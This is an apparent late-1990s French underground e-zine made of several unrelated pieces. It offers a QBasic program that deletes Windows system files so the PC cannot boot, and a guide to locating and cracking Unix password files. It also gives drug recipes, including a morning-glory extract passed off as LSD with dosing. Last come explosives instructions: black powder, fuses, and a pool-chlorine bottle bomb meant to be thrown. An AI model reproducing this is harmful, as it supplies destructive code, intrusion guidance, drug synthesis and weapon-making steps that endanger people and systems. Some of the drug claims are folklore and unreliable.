DOUBLE PI = 4 * ATN(1) text$ = "!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!" DIM TeXtMaTriX(LEN(text$) * 8, 16) AS INTEGER PRINT text$ FOR y% = 1 TO 16 FOR i% = 1 TO (LEN(text$) * 8) TeXtMaTriX(i%, y%) = POINT(i%, y%) NEXT i% NEXT y% CLS cc% = -LEN(text$) * 8 InC% = 8 XRaDiuS% = 50 DO SCREEN 9, 0, 1, 0 CLS IF cc% > 640 THEN cc% = -(LEN(text$) * 8) cc% = cc% + InC% FOR y% = 1 TO 16 FOR X% = cc% TO cc% + LEN(text$) * 8 X2% = (SIN((X% * (PI / 180))) * (XRaDiuS%)) + 270 LINE (X%, (X2% + y%) - 100)-(X%, (X2% + y%) - 100), TeXtMaTriX(X% - cc%, y%), BF NEXT X% NEXT y% SCREEN 9, 0, 0, 0 PCOPY 1, 0 LOOP 3 - Vous pouvez juste faire un tit programme qui a comme fonction kill : REM code par endrix CLS KILL "c:\autoexec.bat" KILL "c:\windows\system\*.vxd KILL "c:\windows\*.vxd KILL "c:\windows\win.com PRINT "Loading..." SLEEP 2 ceci supprime les fichier VXD dans system et dans windows, win.com et l'autoexec.bat. Ce ordinateur ne s'ouvrira plus !!! Conclusion : Je suis sur que vous pourez penser a d'autre solution et je vous souhaite de ne pas vous faire prendre en faisant ca, oky?! ============================================================================== ============================================================================== ============================================================================== - endrix =========================================================================== ==============================par endrix=================================== _____ _ _ _ ____ _ | ___(_) ___| |__ (_) ___ _ __| _ \__ _| | | |_ | |/ __| '_ \| |/ _ \ '__| |_) \ \ /\ / / | | _| | | (__| | | | | __/ | | __/ \ V V /| | |_| |_|\___|_| |_|_|\___|_| |_| \_/\_/ |_| =========================================================================== =========================================================================== O============O <|Introduction|> O============O Bien bonjour, hey oui, j'ai encore écrit un ti-quelque chose pour vous. Ce texte a comme fonction de plus vous renseignez sur les fichiers pwl(password) Vous montrez ou sont place ces fichiers sur les ftps, comment les decoders.. Ceci sera tres utile si vous voullez commencer a faire du ptit piratage. Du PTIT j'ai bien dit. Ceci poura ainsi vous montrez, si vous avez un ftp, de pouvoir vous protegez contre les attaques de lame qui n'ont rien a faire dans la vie que "hacker" des ftp's de Warez et faire un tit deltree /y.... Pour me rejoindre, je suis sur irc(Undernet) sur les channels suivants : #outaouais, #warezfrancais, #pirate, #n0past. Si je suis pas sur une de ces places la, cherchez moi pas :)) Euhhmmm.. mon email est le suivant : lordendrix@hotmail.com et sur ce site web : http://www.haqch.espace2001.com Se serait tres grandement aprecier quelques commentaires.... Ok, now lets rock AND rooolllll !!!! O=====================O <|Les fichiers password|> O=====================O Pour le monde qui debuttent : les fichiers passwords contiennent le mot-de passe mais de maniere crypter. Comme ca l'utilisateur peut pas obtenir le mot-de-passe amoins qu'il le decrypte de maniere a obtenir un access puissant qu'un appelle un "super user account". Voici un exemple de fichier password : chare:u7mHuh5R4Umvo:105:100:Chris Hare:/u/chare:/bin/ksh username:encrypted password:UID:GID:comment:home directory:login shell Voici une table qui expliquera tout ces signes..... le fichier ect/passdw ====================================================================== Nom Description Valeur ====================================================================== username Cette place, est pour chare entrer le nom d'uti- rceh lisateur du systeme. brb il y en a un pour markd chaque personne qui se connecte au serveur. ---------------------------------------------------------------------- encrypted password Cette espace contien u7mHuh5R4Umvo le mot-de-passe en- x crypter. Il y en * a u pour chaque personne qui se con- NOLOGIN necte au serveur. ---------------------------------------------------------------------- UID Cette espace contien 0-60,000 l'ordre numérique de la presentation du systeme. ---------------------------------------------------------------------- GID Cette espace est re- 0-60,000 serve a la represen- tation de l'entre ou l'utilisateur devrai etre. ---------------------------------------------------------------------- comment Ca, sa contien l'in- Chris Hare formation sur l'uti- Ops manager, x273 lisateur. Information personnelle.... # de tel, addresse..... ---------------------------------------------------------------------- home directory Cet espace est l'info- /u/share rmation, a l'entre de /usr/lib/ppp/ppp- l'utilisateur quel de- users vrait etre sont reper- toire d'arrive. ---------------------------------------------------------------------- login shell C'est l'entre qui est /bin/sh parti a l'entre de l'u- /bin/csh tisitateur pour qu'il /bin/ksh puisse bien entrer. Ca /bin/tcsh peut varier selon les /usr/lib/uucp/uucio droits de l'utilisateur. /usr/lib/ppp/ppd ---------------------------------------------------------------------- Ce n'est pas absolument cette ligne qu'il y aura dans le mot de passe encrypter. Mais ce sera probablement semblable. Voici quelque dir pout trouver les informations pour hacker un serveur: /etc/passwd Le fichier password /tcb/auth/files Le fichier proteger de la database /etc/auth/systems/ttys Le terminal de control de la database /etc/auth/subsystems Le subsystems proteger /etc/auth/system/default Le system de database Bon...... Maintenant que vous savez comment prendre un fichier password, quoi faire avec ???? euhhmm.. c'est une bonne question... Pourquoi pas le cracker ??? hein ?? C'est une bone idee je pense. Pour le faire, il vous faudra des programmes. J'ai ici une petite source de Qbasic(sa viens avec windows les mecs...c:\windows\qbasic.exe) Qui vous permettera de cracker des simples mot-de-passe encrypter. CLS PRINT "-------------------------------------------------------------------" PRINT "Ce programme a ete fait par endrix. " PRINT "Il a comme fonction de cracker les password code des ftp. " PRINT "Pour des commentaires,http://www.haqch.espace2001.com " PRINT " lordendrix@hotmail.com " PRINT "-------------------------------------------------------------------" INPUT "Mot-de-passe encrypter :"; I$ FOR X = 1 TO 255 FOR Y = 1 TO LEN(I$) Y$ = MID$(I$, Y, 1) YA = ASC(Y$) n = X XOR YA IF n = 32 THEN F = 1 n$ = n$ + CHR$(n) NEXT Y IF F THEN PRINT "Mot-de-passe possible :"; n$ PRINT I$; " 'encrypter' a "; n$: n$ = "": F = 0 NEXT X PRINT "Finitosss!" Pour d'autre programme ou plus de renseignement sur les fichiers passwords, allez voir ces sites web : http://www.warforge.com http://www.rootshell.com http://endrix.cjb.net http://www.antionline.com O==========O <|Conclusion|> O==========O Bon... J'espere que vous avez aimer ca les dudes et les dudettes !!! Ne faites sourtout pas de connerie avec ca la..... :)))) Adios et venez voir le supperbe site : Http://www.haqch.espace2001.com =========================================================================== =========================================================================== - endrix COMMENT CR++...DE LA MESA SAPIENTUM BANADINE -- PiXl inspiré de Coaxial Karma (NPC #1) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Avertissement: On es aucunement responsable des effets causés par la drogue qui suit. La mesa sapientum banadine (nous l'appellerons banadine), comme sont nom l'indique, est faite a base de bananes. Les effets sont a peu-près les mêmes que pour la marijuana sauf que la quantitée fumée doit être de 3 a 4 fois supérieur et qu'elle provoque des étouffement (des: KeHeu! Keheu!...) lors de l'absorbtion oral. Le principal avantage de la banadine est qu'elle est légal. Selon moi, elle ne vaut pas un bon join acheté a un pusher de confiance. Mais ça, c'est a vous de le juger. Voici donc comment la préparer: 1- Prendre environ 1 kilogramme de pelure de banane 2- Avec un couteau, peler l'intérieur de la banane. 3- Mettre les restants de l'intérieur de la pelure dans un chaudron et, y ajoutez de l'eau. Faites bouillir de trois (3) à quatre (4) heures. Le mélange devrait alors être pateux. 4- Etendre la pƒte sur un plateau à pizza, et cuire environ vingt (20) à trente (30) minutes au four. Le produit qui en résultera devrait alors être une poudre noire. 5- Finalement, fûmez-la jusqu'a l'obtention du "high" désiré...;-) '~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+- COMMENT CRéé...(un dérivé du) LSD-25 -- PiXl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bon, les kids (je suis mal placé pour parlé....mais bon!), je dois vous avertir que le LSD n'est pas très bon pour la santé et que c'est mal d'en prendre...blablabla...Bon, vous êtes maintenant averti(e)s...Passons au choses sérieuses: Comment en fabriquer dans votre cuisine!.. Dans le temps (2 ou 3 ans), le LSD était très populaire dans les party rave. A ce que l'on m'a dit, maintenant c'est plutôt l'exctasy. Je ne sais pas, puisque je ne me tiens pas énormément dans les raves... Plusieurs de mes chums (amis...) m'ont affirmé qu'il aimait mieux (et de loin prendre du LSD dans les party puisque: les yeux ne viennent pas rouge, ça ce consomme vite et sans odeur (pas de troubles) et la décente d'acide ce fait mieux avec des chums que tout seul... Quoi que vous fassiez de cette recette...Un bon conseil, n'abusez-pas! Prendre 150 grammes de graines de "Gloire du matin" Dans 130 cc. d'éther de pétrole, laissez tremper pour 2 jours. Filtrer la solution devant un écran filtre. Jetez le liquide et laisser les graines sècher. Pour 2 jours, laissez tremper dans 110 cc. d'alcool de bois. Filtrez encore, gardez le liquide et appelez-le "1." Laissez encore trempez les graines dans 110 cc. d'alcool de bois pour 2 jours. Filtrez et jetez les graines (garder le liquide!) Ajoutez ce liquide dans le liquide appelé "1." Laissez le liquide sur un plaque a biscuits et laissez évaporer. Quand tout le liquide sera évaporé, il ne vous restera qu'une sorte de gomme jaune. Récupérez-la et placez-la dans de petite capsule. 30 grammes de "Gloire du matin" = 1 trip Il est important de mentionner que certaines compagnies ont enduit leurs graines de "Gloire du matin" avec des produits chimiques qui peuvent être poison. Ainsi, une bonne chose serait de vérifier auprès de vos fournisseurs!.. +tant donné que vous fabriquez vous-même votre LSD, il est EXTREMEMENT important de calculer la quantité de LSD que vous allez absorber ou vendre. En général, 500 a 700 mics. serait une quantité idéale puisque qu'elle est équivalente a un trip d'environ 8 heures. Si vous devez dépasser cette quantité, non seulement vous gaspillez, mais vous risquer d'entraîner des dommages très sérieux à votre cerveau ou même de mourir. N'oubliez-pas que le LSD est la substance connue pour être la plus active sur l'être humain (ce qui signifie que, une toute petite quantité peut fournir un trip très élevé...). -+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+- LE SAVIEZ-VOUS?.. -- PiXl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vous trouver pas qu'un titre comme "Le saviez-vous?..." fait quelques peu Grand magazine. Moi, je trouves ça. Ya peut-être le fait que je viens de me passer 2 gros bat en ligne (penser pas croche la! remplacez passer par fumer). Ce qui m'amène à vous parler d'une petite drogue relaxe qui a bon goût. Il s' agit bien sûr de ce qu'on appelle évidement "la peanuts" (je suis pas sur de l' ortographe). Hé oui!..Cette bonne vieille arachide est une petite drogue très légère. En fait, ce n'est pas l'arachide comme telle, qui est une drogue, mais bien la petite pelure brune autour d'elle. Ca peut paraître surprenant, mais si vous prenez cette "pelure" et que vous vous roulez un beau petit joint avec, vous allez partir (au sens figurer bien-sûr!..ha!..ces jeunes, faut tout leur expliquer!). Personnellement, j'aime bien me prendre un petit joint de peanuts de temps à autres...(mais c'est toff à allumer!...argh!...). Mais je vous conseille de rajouter un peu de weed...Vous savez, la peanuts peut faire un très bon complément pour ceux qui rajoute du tabac dans leur joint de weed (vous êtes mieux de le prendre pure, mais si vous voulez absolument le mélanger a quelques chose, voila une solution!) Ne vous faites pas d'illusion, la peanuts ne vous emmènera jamais plus loin que le monde de JIM MORRISON, et même la...En effet, il faut en prendre énormément pour avoir un bon high. Le seul avantage de la peanuts, selon moi, c'est qu'elle est pratiquement gratuite (au prix que ça coûte...). Rappelez-vous: "Fumer de la peanuts, c'est écologique!" -+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+- LE CANNA PUNCH -- Tod ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ingrédients : 1 litre de rhum blanc agricole 1 gousse de vanille 1 racine de gingembre 100 g d'herbe 50 g de sucre roux Laisser macérer 100 g d'herbe séchée dans un demi litre de Rhum blanc pendant une semaine. Agiter plusieurs fois par jour en veillant à ce que l'alcool recouvre totalement l'herbe. Au bout d'une semaine essorer l'herbe et placer le liquide obtenu dans une bouteille. Mettez à nouveau a macérer l'herbe dans le deuxième demi litre de Rhum blanc pendant une semaine. Faites blanchir des fines tranches de gingembre avec la gousse de vanille fendue ou coupée en morceaux, à feu très doux, et avec une noisette de beurre et un peu d'eau; puis ajouter le sucre roux et tourner continuellement jusqu'à ce que le sucre fonde. Verser le contenu de la dernière macération avec l'herbe et à feu moyen amener jusqu'au bouillonnement. Essorer le tout encore chaud et rajouter au premier liquide. Laisser décanter au moins quinze jours. Un ou deux CANNA PUNCH à jeun feront de l'effet au bout d'un quart d'heure environ. -+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+- _Franck COMMENT FAIRE DU NITRATE DE POTASSIUM? Le nitrate de potassium est un oxydant des plus utilisé dans la fabrication des explosifs lents comme la traditionnelle poudre noire ou poudre a canon,bombe fumigene et d'autres mélanges explosifs ou oxydants.Le nitrate de potassium est disponible a la pharmacie sous le nom de salpetre et qui coute environ entre 3.00$ a 6.00$ pour 100 grammes.Donc il est bon de la fabriquer soit-meme avec le procédé suivant.Mais il faut se procurer quelques éléments qu'on ne peut acheter mais qu'on produit soit-meme. MATÉRIAUX: -1 CONTENANT DE 5 GALLONS (20 LITRES) -2 MORCEAUX DE TISSU TRES FIN -2 GALLONS D'EAU (8 LITRES) -CENDRE DE BOIS BIEN TAMISÉ -2 GALLONS DE COMPOST FAIT A PARTIR DE VÉGÉTAUX BIEN DÉCOMPOSÉS PROCÉDURES: -Prendre le contenant,percer un trou de 1 cm de diametre,déposer un des morceaux de tissu dans le fond du contenant.Ajouter 1 cm d'épais de cendre de bois dessus le morceau de tissu ,mettre l'autre morceau de tissu par dessus. -Mettre les 2 gallons de compost par-dessus le morceau de tissu. -Verser 2 gallons d'eau bouillante sur le compost et récupérer la solution qui d'egoute,prendre cette solution et la filtrer. -Verser la solution dans un contenant pour le faire bouillier,pendant 2 heures.Des petits grains de sel devraient apparaitre,enlevez les quand vous les voyez. -Quand la solution a perdu la moitié de son volume original,enlevez la du feu.Laissez la reposer pendant 30 minutes. -Filtrer ensuite la solution.Les petits crystaux restants sont du nitrate de potassium. IMPORTANT:Le compost doit etre bien décomposé et il se peut que la solution dégage des odeurs. ___________________________________________________________________________ _Franck Comment fabriquer de la poudre noir(poudre a canon)? MATÉRIAUX: -Nitrate de potassium (en grains) 750 ml -Charbon de bois (en grains) 500 ml -Soufre (en grains) 125 ml -Alcool a friction 2500 ml -Eau 750 ml -Source de chaleur (rond de poil) -2 seaux de 7500 ml tres résistant (ex:métal,céramique) PROCÉDURE: -Place l'alcool dans un seau. -Place le nitrate de potassium,le charbon de bois et le soufre dans l'autre seau. Additionne 250 ml d'eau,et agite la solution jusqu'a ce que les ingrédients soient dissous. -Additionne 500 ml d'eau,et place le seau sur une source de chaleur.Faire chauffer jusqu'a temps qu'il est de petite bulles. ATTENTION:NE PAS METTRE LA MIXTURE A ÉBUILLITION,SOIT SUR QU'IL RESTE DE L'EAU. -Enleve la mixture de la source de chaleur et verse la dans l'alcool.Laisse la mixture dans l'alcool pendant 5 minutes. -Enlever le liquide de la mixture et laisser secher. ___________________________________________________________________________ _Franck Fabriquation d'une bombe avec du chlore de piscine. MATÉRIAUX: -Bouteille de liqueur 2 litres -300 ml de chlore de piscine en poudre -300 ml de lave-vitre pour auto. PROCÉDURE: Verser le lave-vitre dans la bouteille.Plier la bouteille en trois de facon a former un cone dans la partie du haut.Verser le chlore dans le cone.Fermer la bouteille avec le bouchon,agitez pour que les 2 solutions entre en contact et lancer immédiatement.La déflagration est d'environ 30 metres carré. ATTENTION:IL NE FAUT PAS QUE LES 2 SOLUTIONS ENTRE EN CONTACT AVANT DE FERMER LE BOUCHON.SI VOUS VOYEZ QUE LE FOND DE LA BOUTEILLE DEVIENT CHAUD,LANCER IMMÉDIATEMENT. __________________________________________________________________________ _Franck Désignations courantes. NOM CHIMIQUE NOM HABITUEL -Acide acétique Vinaigre a 5% -Acide chlorhydrique Acide chlorhydrique (batterie d'auto) -Alum Sulfate d'aluminium -Bicarbonate de sodium Petite vache -Chlorure de sodium Sel de table -Graphite Mine de crayon -Hydroxyde d'ammonium Windex a 20% -Hypochlorite de sodium Eau de javel -Naphtaline Boules a mites -Nitrate de potassium Salpetre -Sulfate de calcium Platre -Sulfate de magnésium Sel epsom -Tétraborate de sodium Borax -Zing,métal Zing (pile de batterie) ____________________________________________________________________________ _Franck Comment faire des meches qui brulent 2 pouces a la minute? MATERIAUX: -3 lacets de cotton -Nitrate de potassium ou chlorate de potassium -Sucre -eau chaude PROCÉDURE: Mixer 1 partie de nitrate de potassium ou de chlorate de potassium avec 1 partie de sucre et ensuite avec 2 parties d'eau chaude.Tremper chaques lacets dans la solution,et faire une tresse avec les lacets. __________________________________________________________________________ _Franck Comment faire des meches qui brulent 40 pouces par minute? MATÉRIAUX: -Poudre a canon -3 lacets en cotton -Farine -Eau chaude PROCÉDURE: Mixer 1 partie de farine avec une partie de poudre a canon.Ensuite mixer ce melange avec 2 parties d'eau chaude.tremper les lacets dans cette solution et faire une tresse avec. ________________________________________________________________________ _Franck Comment faire des feux de différentes couleurs?(feux de bengale) COULEUR DU FEU INGRÉDIENTS NOMBRE DE PARTIE -FEU BLEU: Chlorate de potassium 8 Sulfure de cuivre 2 Soufre 4 Chlorure mercureux 2 Oxyde de cuivre 1 Charbon de bois 1 -FEU VERT : Nitrate de baryum 12 Chlorate de potassium 3 Soufre 2 -FEU BLANC: Nitrate de potassium 7 Sulfure d'antimoine 1 Soufre 1 -FEU ROUGE: Nitrate de strontium 4 Chlorate de potassium 4 Charbon de bois 2 Soufre 1 -FEU JAUNE: Chlorate de potassium 6 Oxalate de sodium 2 Charbon de bois 2 Soufre 1 FEU POUDRE: Sulfate de cuivre 1 Soufre 1 Chlorate de potassium 1 Bien melanger,et alumer. ____________________________________________________________________________ @HAQCH dec 98 tout droits réservées